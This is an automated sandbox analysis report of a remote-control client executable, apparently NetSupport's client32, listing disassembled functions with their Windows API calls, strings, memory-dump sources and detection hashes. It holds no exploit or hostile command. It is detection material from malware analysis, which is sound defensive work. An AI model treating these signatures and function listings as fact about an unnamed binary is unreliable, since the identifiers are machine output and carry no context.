                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
                                                                                                                                                                • String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
                                                                                                                                                                • API String ID: 816263943-3387570681
                                                                                                                                                                • Opcode ID: 0c6371de7803de7a4a3dd9fa395c175fba27eeb06d18d193ba4ca93d1482e223
                                                                                                                                                                • Instruction ID: b7008939c9ec8d9c06a6859de4cfcca3004c8f6374e2649cbbd7cd794522c2fd
                                                                                                                                                                • Opcode Fuzzy Hash: 0c6371de7803de7a4a3dd9fa395c175fba27eeb06d18d193ba4ca93d1482e223
                                                                                                                                                                • Instruction Fuzzy Hash: 0C11E7B4A0121EABDB10EBB59C85FAEB3A8AF4470CF5001E9E91597581EB71B900CB91
                                                                                                                                                                Function 11091620 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 56COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 110916BF
                                                                                                                                                                Strings
                                                                                                                                                                • E:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110916A9
                                                                                                                                                                • NSMClassList, xrefs: 11091667
                                                                                                                                                                • m_hWnd || !"FindClass Window failed to create", xrefs: 11091684
                                                                                                                                                                • findclass.cpp, xrefs: 1109167F
                                                                                                                                                                • m_hWnd, xrefs: 110916AE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryWindow$AddressCreateDefaultFreeLangLoadProcSystemUpdateVersion_memset
                                                                                                                                                                • String ID: E:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$NSMClassList$findclass.cpp$m_hWnd$m_hWnd || !"FindClass Window failed to create"
                                                                                                                                                                • API String ID: 2732523160-3743713504
                                                                                                                                                                • Opcode ID: 3ed2b513fa75c425ddb4287c1f3f8ec767a5c677f8c57cd9371fb6cf693f00a0
                                                                                                                                                                • Instruction ID: 4079d7ea69e215604455db4dd5849739ae81fed9d6595959b1e7783e66955440
                                                                                                                                                                • Opcode Fuzzy Hash: 3ed2b513fa75c425ddb4287c1f3f8ec767a5c677f8c57cd9371fb6cf693f00a0
                                                                                                                                                                • Instruction Fuzzy Hash: 23012D39F4030AB7E3109656EC41FA7F7D89B84728F248034FA1DEA680E670F410C795
                                                                                                                                                                Function 1115F100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 1115F12E
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • SystemParametersInfoA.USER32(00002000,00000000,00000000,00000000), ref: 1115F14F
                                                                                                                                                                • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 1115F162
                                                                                                                                                                • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F177
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                                                                                • API String ID: 3960414890-2201682149
                                                                                                                                                                • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                                                                                • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                                                                                                • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                                                                                • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                                                                                                Function 11003380 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                                                                                                • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                                                                                                • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                                                                                                • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                                                                                                Function 11003290 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EF9), ref: 1100329D
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110032C3
                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 110032E7
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 110032F9
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 4241058051-934300333
                                                                                                                                                                • Opcode ID: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                                                                                                • Instruction ID: ea916ae31ccda8615c5aa97c2145fcab3b24ed556d1c3993920dd856584db00e
                                                                                                                                                                • Opcode Fuzzy Hash: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                                                                                                • Instruction Fuzzy Hash: F8F02E3EE945BA73D31266F53C0DF8BFA584F526ACB060030F434FA645EE14A40081A6
                                                                                                                                                                Function 11119160 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 111192A1
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111192B6
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11119337
                                                                                                                                                                • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                                                                                                • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                                                                                                • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4245181967-0
                                                                                                                                                                • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                                                                                                • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                                                                                                • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                                                                                                • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                                                                                                Function 110EF7F0 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110EF833
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                • Opcode ID: 1bf71b7922f493cf758c4cfdd3d15a835bbe69cd7b2b6006d365e5712d7cb7fa
                                                                                                                                                                • Instruction ID: a4e4d58371b674908632e53d4b5195e92cf7632325e6b2c19727230f49b969e3
                                                                                                                                                                • Opcode Fuzzy Hash: 1bf71b7922f493cf758c4cfdd3d15a835bbe69cd7b2b6006d365e5712d7cb7fa
                                                                                                                                                                • Instruction Fuzzy Hash: 5F41D232E01219AFD714CFB8D889BAEF7F8EF88709F10456AE516D7280DA71E901C791
                                                                                                                                                                Function 11025122 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                                                                                                • _strncat.LIBCMT ref: 1102518B
                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                                                                                                • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                                                                                                • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                                                                                                • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                                                                                                • SetFocus.USER32(?), ref: 11025265
                                                                                                                                                                  • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3832070631-0
                                                                                                                                                                • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                                                                                                • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                                                                                                • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                                                                                                • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                                                                                                Function 11143700 Relevance: 12.1, APIs: 8, Instructions: 85COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000000,?,76968400), ref: 11143720
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11143733
                                                                                                                                                                • GetFileVersionInfoSizeA.VERSION(?,?), ref: 11143753
                                                                                                                                                                • _malloc.LIBCMT ref: 1114375F
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 1114377D
                                                                                                                                                                • _free.LIBCMT ref: 1114378D
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • VerQueryValueA.VERSION(?,1119958C,?,?,?,?,00000000,00000000,?), ref: 111437BE
                                                                                                                                                                • _free.LIBCMT ref: 111437E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
